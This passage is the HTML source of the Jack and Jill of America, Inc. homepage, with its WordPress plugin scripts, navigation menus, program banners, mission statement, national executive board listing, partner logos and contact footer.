1em !important; margin: 0 .07em !important; vertical-align: -0.1em !important; background: none !important; padding: 0 !important; } </style> <link rel="stylesheet" href="https://jackandjillinc.org/wp-content/plugins/xhanch-my-twitter/css/css.php" type="text/css" media="screen" /><style type="text/css">/*<![CDATA[*/ #xmt_jackandjill_wid.xmt ul li.tweet_list{min-height:57px} /*]]>*/</style><style type="text/css">/*<![CDATA[*/ #xmt_Primary_wid.xmt ul li.tweet_list{min-height:57px} /*]]>*/</style><link rel='stylesheet' id='sn-fontAwesome-css-css' href='//maxcdn.bootstrapcdn.com/font-awesome/4.2.0/css/font-awesome.min.css?ver=1.1' type='text/css' media='all' /> <link rel='stylesheet' id='sn-animate-css-css' href='https://jackandjillinc.org/wp-content/plugins/domain-replace/duogeek/inc/animate.css?ver=1.1' type='text/css' media='all' /> <link rel='stylesheet' id='dg-grid-css-css' href='https://jackandjillinc.org/wp-content/plugins/domain-replace/duogeek/inc/dg-grid.css?ver=1.1' type='text/css' media='all' /> <link rel='stylesheet' id='swiftype-css' href='https://jackandjillinc.org/wp-content/plugins/swiftype-search/assets/autocomplete.css?ver=4.3.19' type='text/css' media='all' /> <link rel='stylesheet' id='twentyfourteen-lato-css' href='https://fonts.googleapis.com/css?family=Lato%3A300%2C400%2C700%2C900%2C300italic%2C400italic%2C700italic&#038;subset=latin%2Clatin-ext' type='text/css' media='all' /> <link rel='stylesheet' id='genericons-css' href='https://jackandjillinc.org/wp-content/themes/JackandJillTheme/genericons/genericons.css?ver=3.0.3' type='text/css' media='all' /> <link rel='stylesheet' id='twentyfourteen-style-css' href='https://jackandjillinc.org/wp-content/themes/JackandJillTheme/style.css?ver=4.3.19' type='text/css' media='all' /> <!--[if lt IE 9]> <link rel='stylesheet' id='twentyfourteen-ie-css' href='https://jackandjillinc.org/wp-content/themes/JackandJillTheme/css/ie.css?ver=20131205' type='text/css' media='all' /> <![endif]--> <link rel='stylesheet' id='PI_stt_front-css' href='https://jackandjillinc.org/wp-content/plugins/simple-twitter-tweets/css/stt.min.css?ver=4.3.19' type='text/css' media='all' /> <script type='text/javascript' src='https://jackandjillinc.org/wp-includes/js/jquery/jquery.js?ver=1.11.3'></script> <script type='text/javascript' src='https://jackandjillinc.org/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1'></script> <script type='text/javascript'> /* <![CDATA[ */ var swiftypeParams = {"engineKey":"zySSByf4gxcmQkLn2qoC"}; /* ]]> */ </script> <script type='text/javascript' src='https://jackandjillinc.org/wp-content/plugins/swiftype-search/assets/install_swiftype.min.js?ver=4.3.19'></script> <script type='text/javascript' src='https://jackandjillinc.org/wp-content/plugins/xhanch-my-twitter/js/innerfade.js?ver=4.3.19'></script> <script type='text/javascript' src='https://jackandjillinc.org/wp-content/plugins/xhanch-my-twitter/js/marquee.js?ver=4.3.19'></script> <script type='text/javascript'> /* <![CDATA[ */ var FlowFlowOpts = {"streams":{"id1":{"id":"1","name":"JackandJillInc","feeds":"[{\"content\":\"JackandJillInc\",\"retweets\":\"nope\",\"replies\":\"nope\",\"id\":\"zh74700\",\"type\":\"twitter\"}]","posts":"20","cache":"yep","cache-lifetime":"10","private":"nope","hide-on-desktop":"nope","hide-on-mobile":"nope","heading":"","headingcolor":"rgb(154, 78, 141)","subheading":"","subheadingcolor":"rgb(114, 112, 114)","hhalign":"center","bgcolor":"rgb(229, 229, 229)","mobileslider":"nope","viewportin":"yep","layout":"grid","theme":"classic","gc-style":"style-4","width":"260","margin":"20","cardcolor":"rgb(255, 255, 255)","namecolor":"rgb(154, 78, 141)","textcolor":"rgb(85, 85, 85)","linkscolor":"rgb(94, 159, 202)","restcolor":"rgb(132, 118, 129)","shadow":"rgba(0, 0, 0, 0.22)","bcolor":"rgba(240, 237, 231, 0.4)","talign":"left","css":""}},"open_in_new":"nope","filter_all":"All","filter_search":"Search","expand_text":"Expand","collapse_text":"Collapse","posted_on":"Posted on","show_more":"Show more","dates":{"Yesterday":"Yesterday","s":"s","m":"m","h":"h","ago":"ago","months":["Jan","Feb","March","April","May","June","July","Aug","Sept","Oct","Nov","Dec"]},"lightbox_navigate":"Navigate with arrow keys","server_time":"1558021531","isAdmin":"","forceHTTPS":"nope","isLog":"","plugin_ver":"1.3.13"}; /* ]]> */ </script> <script type='text/javascript' src='https://jackandjillinc.org/wp-content/plugins/flow-flow-social-streams/js/require-utils.js?ver=1.0.5'></script> <link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://jackandjillinc.org/xmlrpc.php?rsd" /> <link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://jackandjillinc.org/wp-includes/wlwmanifest.xml" /> <meta name="generator" content="WordPress 4.3.19" /> <link rel='canonical' href='https://jackandjillinc.org/' /> <link rel='shortlink' href='https://jackandjillinc.org/' /> <!-- <meta name="NextGEN" version="2.1.46" /> --> <style type="text/css">.broken_link, a.broken_link { text-decoration: line-through; }</style> <!-- BEGIN GADWP v4.9.3.2 Universal Tracking - https://deconf.com/google-analytics-dashboard-wordpress/ --> <script> (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){ (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o), m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m) })(window,document,'script','//www.google-analytics.com/analytics.js','ga'); ga('create', 'UA-77004807-1', 'auto'); ga('send', 'pageview'); </script> <!-- END GADWP Universal Tracking --> <link href="https://jackandjillinc.org/wp-content/themes/JackandJillTheme/css/responsive.css" type="text/css" rel="stylesheet"> <link rel="shortcut icon" href="https://jackandjillinc.org/wp-content/themes/JackandJillTheme/favicon.ico" /> <link href="/favicon.ico" rel="shortcut icon" type="image/x-icon" /> <link rel="stylesheet" href="https://jackandjillinc.org/wp-content/plugins/xhanch-my-twitter/css/css.php" type="text/css" media="screen" /><style type="text/css">/*<![CDATA[*/ #xmt_jackandjill_wid.xmt ul li.tweet_list{min-height:57px} /*]]>*/</style><style type="text/css">/*<![CDATA[*/ #xmt_Primary_wid.xmt ul li.tweet_list{min-height:57px} /*]]>*/</style></head> <body> <div class="wrapper"> <header class="header"> <div class="top_header"> <div class="container"> <a href="https://jackandjillinc.org/" class="logo"> <img src="/wp-content/uploads/2016/03/jj_logo1.png" alt=""> <strong> <span>Jack and Jill</span> <em>of <big>A</big>merica, <big>I</big>ncorporated</em> </strong> <span class="clear"></span> </a> <div class="right_header"> <div class="top_search"> <form id="searchform" action="https://jackandjillinc.org/" method="get"> <input name="s" type="text" value="" placeholder="Search this Site..."> <input id="searchsubmit" type="submit" value=""> <a href="#" class="open_seach_form"></a> </form> </div> <nav class="top_navigation"> <ul> <li><a href="http://members.jackandjillinc.org/" target="_blank">DOCUMENTS</a></li> </ul> <span class="clear"></span> </nav> <div class="social_icons"> <ul> <li><a href="https://www.facebook.com/Jack-and-Jill-of-America-Incorporated-58977832657/" target="_blank"><i class="fa fa-facebook"></i></a></li> <li><a href="https://twitter.com/JackandJillInc?ref_src=twsrc%5Egoogle%7Ctwcamp%5Eserp%7Ctwgr%5Eauthor" target="_blank"><i class="fa fa-twitter"></i></a></li> </ul> <span class="clear"></span> </div> <span class="clear"></span> </div> <span class="clear"></span> </div> </div> <div class="navigation_wrap"> <div class="container"> <a href="#" class="menubtn"><span></span><span></span> <span></span></a> <nav class="navigation"> <ul> <li id="menu-item-646" class="menu-item menu-item-type-post_type menu-item-object-page current-menu-item page_item page-item-271 current_page_item menu-item-646"><a href="https://jackandjillinc.org/">Home</a></li> <li id="menu-item-1003" class="menu-item menu-item-type-custom menu-item-object-custom current-menu-ancestor current-menu-parent menu-item-has-children menu-item-1003"><a href="#">About</a> <ul class="sub-menu"> <li id="menu-item-309" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-309"><a href="https://jackandjillinc.org/about-us/">About Us</a></li> <li id="menu-item-315" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-315"><a href="https://jackandjillinc.org/presidents-welcome/">President’s Welcome</a></li> <li id="menu-item-2623" class="menu-item menu-item-type-custom menu-item-object-custom current-menu-item current_page_item menu-item-2623"><a href="/#natdir">National Executive Board</a></li> <li id="menu-item-313" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-313"><a href="https://jackandjillinc.org/national-teen-board/">National Teen Board</a></li> <li id="menu-item-310" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-310"><a href="https://jackandjillinc.org/fathers-auxiliary/">Father’s Auxiliary</a></li> <li id="menu-item-314" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-314"><a href="https://jackandjillinc.org/past-national-presidents/">Past National Presidents</a></li> <li id="menu-item-1119" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1119"><a href="https://jackandjillinc.org/associate-members/">Associates</a></li> <li id="menu-item-1251" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1251"><a href="https://jackandjillinc.org/membership-central/">Membership Central</a></li> </ul> </li> <li id="menu-item-1004" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-1004"><a href="#">PROGRAMS</a> <ul class="sub-menu"> <li id="menu-item-2109" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-2109"><a href="https://jackandjillinc.org/2017oth/">2017 On the Hill Summit</a></li> <li id="menu-item-280" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-280"><a href="https://jackandjillinc.org/national-programming/">National Programming</a></li> <li id="menu-item-274" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-274"><a href="https://jackandjillinc.org/bedtime-stories/">Bedtime Stories</a></li> <li id="menu-item-282" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-282"><a href="https://jackandjillinc.org/rebuild-america/">Rebuild America</a></li> </ul> </li> <li id="menu-item-1246" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-1246"><a href="https://jackandjillinc.org/regions/">Regions</a> <ul class="sub-menu"> <li id="menu-item-330" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-330"><a href="https://jackandjillinc.org/central-region/">Central Region</a></li> <li id="menu-item-331" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-331"><a href="https://jackandjillinc.org/eastern-region/">Eastern Region</a></li> <li id="menu-item-332" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-332"><a href="https://jackandjillinc.org/far-west-region/">Far West Region</a></li> <li id="menu-item-333" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-333"><a href="https://jackandjillinc.org/mid-atlantic-region/">Mid-Atlantic Region</a></li> <li id="menu-item-338" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-338"><a href="https://jackandjillinc.org/mid-western-region/">Mid-Western Region</a></li> <li id="menu-item-339" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-339"><a href="https://jackandjillinc.org/south-central-region/">South Central Region</a></li> <li id="menu-item-340" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-340"><a href="https://jackandjillinc.org/southeastern-region/">Southeastern Region</a></li> </ul> </li> <li id="menu-item-1006" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-1006"><a href="#">CONNECT</a> <ul class="sub-menu"> <li id="menu-item-476" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-476"><a href="https://jackandjillinc.org/?page_id=484">National Headquarters</a></li> <li id="menu-item-477" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-477"><a href="https://jackandjillinc.org/?page_id=486">Jack and Jill of America Foundation</a></li> <li id="menu-item-478" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-478"><a href="https://jackandjillinc.org/?page_id=46">Partners and Affiliates</a></li> <li id="menu-item-479" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-479"><a href="https://jackandjillinc.org/?page_id=488">Vendors</a></li> </ul> </li> </ul> <span class="clear"></span> </nav> <!-- <a href="http://jjoa.membershipsoftware.org/" class="log_in_btn">member central log in</a> --> <a href="http://members.jackandjillinc.org/" class="log_in_btn">member central log in</a> <span class="clear"></span> </div> </div> </header> <div class="main_container" > <section class="banner"> <div class="flexslider"> <ul class="slides"> <li> <img src="https://jackandjillinc.org/wp-content/uploads/2019/05/2019-US-Open-STD-Banner.png" alt=""> <div class="slider_cont_wrap"> <div class="container"> <div class="slider_cont"> <div class="slider_cont_in"> <h1></h1> <strong></strong> <a href="" class="learn_more">LEARN MORE</a> </div> </div> </div> </div> </li> <li> <img src="https://jackandjillinc.org/wp-content/uploads/2019/03/NAMI_Banner-FINAL-2-web.png" alt=""> <div class="slider_cont_wrap"> <div class="container"> <div class="slider_cont"> <div class="slider_cont_in"> <h1></h1> <strong></strong> <a href="https://jackandjillinc.org/nami-partnership/" class="learn_more">LEARN MORE</a> </div> </div> </div> </div> </li> <li> <img src="https://jackandjillinc.org/wp-content/uploads/2016/03/2019-OTH-STD-Banner-UPDATED-1.png" alt=""> <div class="slider_cont_wrap"> <div class="container"> <div class="slider_cont"> <div class="slider_cont_in"> <h1></h1> <strong></strong> <a href="" class="learn_more">LEARN MORE</a> </div> </div> </div> </div> </li> <li> <img src="https://jackandjillinc.org/wp-content/uploads/2016/03/welcome-new-chapters-2018.png" alt=""> <div class="slider_cont_wrap"> <div class="container"> <div class="slider_cont"> <div class="slider_cont_in"> <h1></h1> <strong></strong> <a href="" class="learn_more">LEARN MORE</a> </div> </div> </div> </div> </li> <li> <img src="https://jackandjillinc.org/wp-content/uploads/2018/09/fivestarbanner-2018-1.png" alt=""> <div class="slider_cont_wrap"> <div class="container"> <div class="slider_cont"> <div class="slider_cont_in"> <h1></h1> <strong></strong> <a href="" class="learn_more">LEARN MORE</a> </div> </div> </div> </div> </li> <li> <img src="https://jackandjillinc.org/wp-content/uploads/2016/03/2019-Founders-Day-Banner-web.jpg" alt=""> <div class="slider_cont_wrap"> <div class="container"> <div class="slider_cont"> <div class="slider_cont_in"> <h1></h1> <strong></strong> <a href="https://spark.adobe.com/video/Umo5CzqPxx1Nc" class="learn_more">LEARN MORE</a> </div> </div> </div> </div> </li> <li> <img src="https://jackandjillinc.org/wp-content/uploads/2018/10/Moor-Cruise-Banner-updated.png" alt=""> <div class="slider_cont_wrap"> <div class="container"> <div class="slider_cont"> <div class="slider_cont_in"> <h1></h1> <strong></strong> <a href="https://continuingeducation.net/Jack&Jill" class="learn_more">LEARN MORE</a> </div> </div> </div> </div> </li> <li> <img src="https://jackandjillinc.org/wp-content/uploads/2018/07/Book-Sales-Banner-web.jpg" alt=""> <div class="slider_cont_wrap"> <div class="container"> <div class="slider_cont"> <div class="slider_cont_in"> <h1></h1> <strong></strong> <a href="https://www.stellarchicago.com/#order_books" class="learn_more">LEARN MORE</a> </div> </div> </div> </div> </li> <li> <img src="https://jackandjillinc.org/wp-content/uploads/2016/03/slide121.jpg" alt=""> <div class="slider_cont_wrap"> <div class="container"> <div class="slider_cont"> <div class="slider_cont_in"> <h1>Dedicated to Nurturing Future</h1> <strong>African American Leaders.</strong> <a href="/?page_id=66" class="learn_more">LEARN MORE</a> </div> </div> </div> </div> </li> </ul> <span class="clear"></span> </div> </section> <section class="middle_container"> <div class="container"> <section class="quick_links"> <ul> <li> <img src="https://jackandjillinc.org/wp-content/uploads/2016/03/home-page-icon-about-us.jpg" alt=""> <h4>about us</h4> <p class="p1"><span class="s1">Jack and Jill of America, Inc. boasts 247 chapters nationwide, representing over 40,000 family members.</span></p> <a href="?page_id=66" class="learn_more">LEARN MORE</a> </li> <li> <img src="https://jackandjillinc.org/wp-content/uploads/2016/03/home-page-icon-programs.jpg" alt=""> <h4>PROGRAMS</h4> <p class="p1"><span class="s1">The idea of bringing together children through educational, social and cultural experiences.</span></p> <a href="https://jackandjillinc.org/?page_id=9" class="learn_more">LEARN MORE</a> </li> <li> <img src="https://jackandjillinc.org/wp-content/uploads/2016/03/home-page-icon-calendar.jpg" alt=""> <h4>EVENTS</h4> <p class="p1">Choose from upcoming events.</p> <p>44th  National Convention</p> <a href="https://jj.amsasp.com/members" class="learn_more">LEARN MORE</a> </li> <li> <img src="https://jackandjillinc.org/wp-content/uploads/2016/03/home-page-icon-partners.jpg" alt=""> <h4>PARTNERS</h4> <p class="p1">Our partners enable<br /> our children with the power to make a difference.</p> <a href="https://jackandjillinc.org/?page_id=46" class="learn_more">LEARN MORE</a> </li> </ul> <span class="clear"></span> </section> <section class="our_programs"> <h2>The Power to Make a Difference. <strong>See our programs.</strong></h2> <div class="big"> <a href="https://jackandjillinc.org/?page_id=9"> <img src="https://jackandjillinc.org/wp-content/uploads/2016/03/img111.png" alt=""> <h3><span>Youth Leadership Program</span></h3> </a> </div> <div class="upcoming_events small"> <a href="https://jj.amsasp.com/members/" title="Events" class="learn_more"> <img src="/wp-content/uploads/2016/06/calendar3.jpg" alt=""> <h3>Upcoming Events</h3> </a></div> <!-- <div class="upcoming_events small"> <h4>Upcoming Events</h4> <!-- <a href="#" class="view_more">view more <i class="fa fa-caret-right"></i></a> </div>--> <div class="tweeter_field small"> <span><i class="fa fa-twitter"></i></span> <div class="textwidget"><a class="twitter-timeline" href="https://twitter.com/JackandJillInc" data-widget-id="725137398196264960" data-chrome="transparent">Tweets by @JackandJillInc</a> <script>!function(d,s,id){var js,fjs=d.getElementsByTagName(s)[0],p=/^http:/.test(d.location)?'http':'https';if(!d.getElementById(id)){js=d.createElement(s);js.id=id;js.src=p+"://platform.twitter.com/widgets.js";fjs.parentNode.insertBefore(js,fjs);}}(document,"script","twitter-wjs");</script></div> </div> <div class="big"> <a href="/bedtime-stories"> <img src="https://jackandjillinc.org/wp-content/uploads/2016/04/bts-1.jpg" alt=""> <h3><span>Bedtime Stories</span></h3> </a> </div> <div class="big"> <a href="/rebuild-america"> <img src="https://jackandjillinc.org/wp-content/uploads/2016/03/img31.png" alt=""> <h3><span>Rebuild America</span></h3> </a> </div> <span class="clear"></span> </section> </div> </section> <section class="make_difference"> <div class="container"> <a href="#" class="make_diff_logo"><img src="" alt=""></a> <h3>The Power to Make a <strong>Difference.</strong></h3> <p>As a complement to the programming delivered at the chapter level, the National Programmatic Thrust focuses on initiatives that will equip our members and youth with the power to make a difference in our chapters, communities and in the lives of children around the country..</p> <a href=" " class="learn_more">LEARN MORE</a> <div class="hand_logo"><img src="https://jackandjillinc.org/wp-content/uploads/2016/03/hand_icon21.png" alt=""><a href="#"><img src="https://jackandjillinc.org/wp-content/uploads/2016/03/jj_logo1.png" alt=""></a></div> </div> </section> <section class="team_mission_section"> <div class="container"> <section class="mission_section"> <h2>Mission <strong>Statement</strong></h2> <p>Jack and Jill of America, Inc. is a membership organization of mothers with children ages 2-19, dedicated to nurturing future African-American leaders by strengthening children through leadership development, volunteer service, philanthropic giving and civic duty.<br /> <a name="natdir"></a></p> </section> <section class="team_session"> <h2>The People Behind Jack and Jill. <strong>National Executive Board.</strong></h2> <ul> <li> <a href="https://jackandjillinc.org/executive_board/danielle-brown/"> <img src="https://jackandjillinc.org/wp-content/uploads/2018/10/NP-Danielle-Brown-web.jpg" alt=""> </a> <h5>Danielle Brown</h5> <span>National President</span> </li> <li> <a href="https://jackandjillinc.org/executive_board/tanya-hand/"> <img src="https://jackandjillinc.org/wp-content/uploads/2018/11/NVP-Tanya-Hand-New-web-1.jpg" alt=""> </a> <h5>Tanya Hand</h5> <span>National Vice President</span> </li> <li> <a href="https://jackandjillinc.org/executive_board/pamela-d-taylor-2/"> <img src="https://jackandjillinc.org/wp-content/uploads/2018/10/NT-Pamela-Taylor-web.png" alt=""> </a> <h5>Pamela D Taylor</h5> <span>National Treasurer</span> </li> <li> <a href="https://jackandjillinc.org/executive_board/lisa-grant-dawson/"> <img src="https://jackandjillinc.org/wp-content/uploads/2018/10/NPD-Lisa-Grant-Dawson-web.png" alt=""> </a> <h5>Lisa Grant-Dawson</h5> <span>National Program Director</span> </li> <li> <a href="https://jackandjillinc.org/executive_board/michelle-gentry-anderson-2/"> <img src="https://jackandjillinc.org/wp-content/uploads/2018/10/NRS-Michelle-Gentry-Anderson-web.png" alt=""> </a> <h5>Michelle Gentry Anderson</h5> <span>National Recording Secretary</span> </li> <li> <a href="https://jackandjillinc.org/executive_board/consuella-guillory-adams-2/"> <img src="https://jackandjillinc.org/wp-content/uploads/2018/10/NCS-Consuella-Guillory-Adams-web.png" alt=""> </a> <h5>Consuella Guillory-Adams</h5> <span>National Corresponding Secretary</span> </li> <li> <a href="https://jackandjillinc.org/executive_board/gina-williams-jackson/"> <img src="https://jackandjillinc.org/wp-content/uploads/2018/10/NE-Gina-Williams-Jackson-web.jpg" alt=""> </a> <h5>Gina Williams-Jackson</h5> <span>National Editor</span> </li> </ul> <span class="clear"></span> </section> </div> </section> <section class="spotlight_section"> <img src="https://jackandjillinc.org/wp-content/uploads/2016/03/spotlight11.jpg" alt=""> <div class="spotlight_wrap"> <div class="container"> <div class="spotlight_cont"> <div class="spotlight_inner_cont"> <h4>JACK AND JILL SPOTLIGHT</h4> <div class="spotlight_list"> <ul> <li> <a href="https://wefunder.com/updates/94609" target="_blank"> <img src="https://jackandjillinc.org/wp-content/uploads/2016/03/MemberSpotlight-Vanessa-Braxton-bottom.png" alt=""> </a> <h6>MEMBER SPOTLIGHT - Vanessa Braxton</h6> </li> <li> <a href="http://writeinbk.com/about/" target="_blank"> <img src="https://jackandjillinc.org/wp-content/uploads/2019/05/Alumni-Spotlight-TiffanyDJackson.png" alt=""> </a> <h6>ALUMNI SPOTLIGHT - Tiffany D. Jackson</h6> </li> <li> <a href="https://hbcubuzz.com/2018/09/howard-university-alum-takes-over-as-cfo-at-citigroup/" target="_blank"> <img src="https://jackandjillinc.org/wp-content/uploads/2016/03/father-spotlight-markmason-web.jpg" alt=""> </a> <h6>FATHER SPOTLIGHT - Mark Mason</h6> </li> <li> <a href="https://jackandjillinc.org/a-history-moment-5/" target="_blank"> <img src="https://jackandjillinc.org/wp-content/uploads/2016/03/history-moment.jpg" alt=""> </a> <h6>A History Moment</h6> </li> </ul> <span class="clear"></span> </div> <div class="spotlight_social"> <div class="spotlight_social_left"> <ul> <li><a href="https://members.jackandjillinc.org/"><span><i class="fa fa-envelope-o" class="twitter-follow-button" data-show-count="false"></i></span><em>Sign Up for Email</em><span class="clear"></span></a></li> <li><a href="https://twitter.com/jackandjillinc"><span><i class="fa fa-twitter"></i></span><em>Follow Us on Twitter</em><span class="clear"></span></a></li> <li><a href="https://www.facebook.com/Jack-and-Jill-of-America-Incorporated-58977832657/"><span><i class="fa fa-thumbs-up" class="fb-follow" data-href="https://www.facebook.com/Jack-and-Jill-of-America-Incorporated-58977832657" data-colorscheme="light" data-layout="button_count" data-show-faces="false"></i></span><em>Like Us on Facebook</em><span class="clear"></span></a></li> </ul> <span class="clear"></span> </div> <div class="spotlight_social_right"> <span> <a href="http://www.facebook.com/sharer.php?u=https://jackandjillinc.org/&amp;t=Home" onclick="window.open(this.href); return false;" class="facebook_share"><i class="fa fa-facebook"></i>SHARE</a> <a href="http://twitter.com/home?status=Reading:https://jackandjillinc.org/" class="tweeter_share" target="_blank"><i class="fa fa-twitter"></i>TWEET</a> </span> <em>HELP SPREAD THE WORD.</em> </div> <span class="clear"></span> </div> </div> </div> </div> </div> </section> </div> <footer class="footer"> <div class="top_footer"> <div class="container"> <div class="left_footer"> <div class="footer_top_links"> <ul> <li> <h4>HOME</h4> <ul> <li id="menu-item-286" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-286"><a href="https://jackandjillinc.org/about-us/">About Us</a></li> <li id="menu-item-347" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-347"><a href="https://jackandjillinc.org/presidents-welcome/">President’s Welcome</a></li> <li id="menu-item-348" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-348"><a href="https://jackandjillinc.org/national-officers-1/">National Officers</a></li> <li id="menu-item-344" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-344"><a href="https://jackandjillinc.org/past-national-presidents/">Past National Presidents</a></li> <li id="menu-item-345" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-345"><a href="https://jackandjillinc.org/fathers-auxiliary/">Father’s Auxiliary</a></li> <li id="menu-item-346" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-346"><a href="https://jackandjillinc.org/national-teen-board/">National Teen Board</a></li> </ul> </li> <li> <h4>PROGRAMS</h4> <ul> <li id="menu-item-295" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-295"><a href="https://jackandjillinc.org/national-programming/">National Programming</a></li> <li id="menu-item-349" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-349"><a href="https://jackandjillinc.org/bedtime-stories/">Bedtime Stories</a></li> <li id="menu-item-351" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-351"><a href="https://jackandjillinc.org/rebuild-america/">Rebuild America</a></li> </ul> </li> <li> <h4>Regions</h4> <ul> <li id="menu-item-352" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-352"><a href="https://jackandjillinc.org/central-region/">Central Region</a></li> <li id="menu-item-353" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-353"><a href="https://jackandjillinc.org/eastern-region/">Eastern Region</a></li> <li id="menu-item-354" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-354"><a href="https://jackandjillinc.org/far-west-region/">Far West Region</a></li> <li id="menu-item-355" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-355"><a href="https://jackandjillinc.org/mid-atlantic-region/">Mid-Atlantic Region</a></li> <li id="menu-item-301" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-301"><a href="https://jackandjillinc.org/mid-western-region/">Mid-Western Region</a></li> <li id="menu-item-357" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-357"><a href="https://jackandjillinc.org/south-central-region/">South Central Region</a></li> <li id="menu-item-358" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-358"><a href="https://jackandjillinc.org/southeastern-region/">Southeastern Region</a></li> </ul> </li> </ul> <span class="clear"></span> </div> <div class="footer_btm_links"> <ul> <li id="menu-item-459" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-459"><a href="https://jackandjillinc.org/?page_id=66">ABOUT JACK AND JILL</a></li> <li id="menu-item-361" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-361"><a href="https://jackandjillinc.org/our-partners/">Partners</a></li> </ul> <span class="clear"></span> </div> <div class="footer_search"> <form id="searchform" action="https://jackandjillinc.org/" method="get"> <input name="s" type="text" value=""> <input id="searchsubmit" type="submit" value=""> </form> </div> <span class="clear"></span> <div class="partners_list"> <ul> <li> <span><em><a href="http://www.heart.org/HEARTORG/" target="_blank"><img src="/wp-content/uploads/2016/04/aha_footer.png" alt="American Heart Association"></a></em></span> </li> <li> <span><em><a href="https://www.redcross.org/" target="_blank"><img src="https://jackandjillinc.org/wp-content/uploads/2019/05/American_Red_Cross_logo-web.png" alt="American Red Cross"></a></em></span> </li> <li> <span><em><a href="http://www.childrensdefense.org/" target="_blank"><img src="/wp-content/uploads/2016/04/cdf_footer.jpg" alt="Children’s Defense Fund"></a></em></span> </li> <li> <span><em><a href="http://www.marchofdimes.org/" target="_blank"><img src="https://jackandjillinc.org/wp-content/uploads/2019/05/modlogostackedrgbbrandpurple-web.png" alt="March of Dimes"></a></em></span> </li> <li> <span><em><a href="http://www.nami.org/" target="_blank"><img src="https://jackandjillinc.org/wp-content/uploads/2017/07/nami-logo.png" alt="National Alliance on Mental Illness"></a></em></span> </li> <li> <span><em><a href="https://www.stjude.org/" target="_blank"><img src="https://jackandjillinc.org/wp-content/uploads/2019/05/st-jude-logo-web.png" alt="St. Jude Children's Research Hospital"></a></em></span> </li> </ul> <span class="clear"></span> </div> </div> <div class="right_footer"> <div class="member_central_form"> <h4>Member Central</h4> <p>Log in to your Jack and Jill Member Account</p> <a href="https://members.jackandjillinc.org/" title="Login" class="button-pink">Log In</a> </div> <div class="footer_address"> <h6>JACK AND JILL OF AMERICA, INCORPORATED</h6> <address><i class="fa fa-home"></i>1930 17th Street, NW<br>Washington, DC 20009</address> <span class="phone_no"><i class="fa fa-phone-square"></i>202-667-7010</span> <span class="email_address"><i class="fa fa-envelope-o"></i><a href="mailto:[email protected]">[email protected]</a></span> <div class="social_links"> <ul> <li><a href="https://www.facebook.com/Jack-and-Jill-of-America-Incorporated-58977832657/" target="_blank"><i class="fa fa-facebook"></i></a></li> <li><a href="https://twitter.com/JackandJillInc" target="_blank"><i class="fa fa-twitter"></i></a></li> </ul> <span class="clear"></span> </div> </div> </div> <span class="clear"></span> </div> </div> <div class="btm_footer"> <div class="container"> <p><span>© Copyright 2019,</span><span> Jack and Jill of America, Incorporated. </span><span>All rights reserved. </span>Site by <a href="http://vivo360inc.com/" target="_blank">VIVO360, Inc.</a></p> </div> </div> </footer> </div> <script type="text/javascript" src="https://jackandjillinc.org/wp-content/themes/JackandJillTheme/js/jquery-1.9.1.min.js"></script> <script type="text/javascript" src="https://jackandjillinc.org/wp-content/themes/JackandJillTheme/js/jquery-migrate-1.2.1.min.js"></script> <script type="text/javascript" src="https://jackandjillinc.org/wp-content/themes/JackandJillTheme/js/jquery.flexslider-min.js"></script> <script type="text/javascript" src="https://jackandjillinc.org/wp-content/themes/JackandJillTheme/js/jquery.matchHeight.js"></script> <script type="text/javascript" src="https://jackandjillinc.org/wp-content/themes/JackandJillTheme/js/slider.js"></script> <script type="text/javascript" src="https://jackandjillinc.org/wp-content/themes/JackandJillTheme/js/combined.min.js"></script> <script type="text/javascript" src="https://jackandjillinc.org/wp-content/themes/JackandJillTheme/js/jquery.easing.1.3.js"></script> <script type="text/javascript" src="https://jackandjillinc.org/wp-content/themes/JackandJillTheme/js/flowslider.jquery.min.js"></script> <script type="text/javascript" src="https://jackandjillinc.org/wp-content/themes/JackandJillTheme/js/leadership.min.js"></script> <script type="text/javascript" 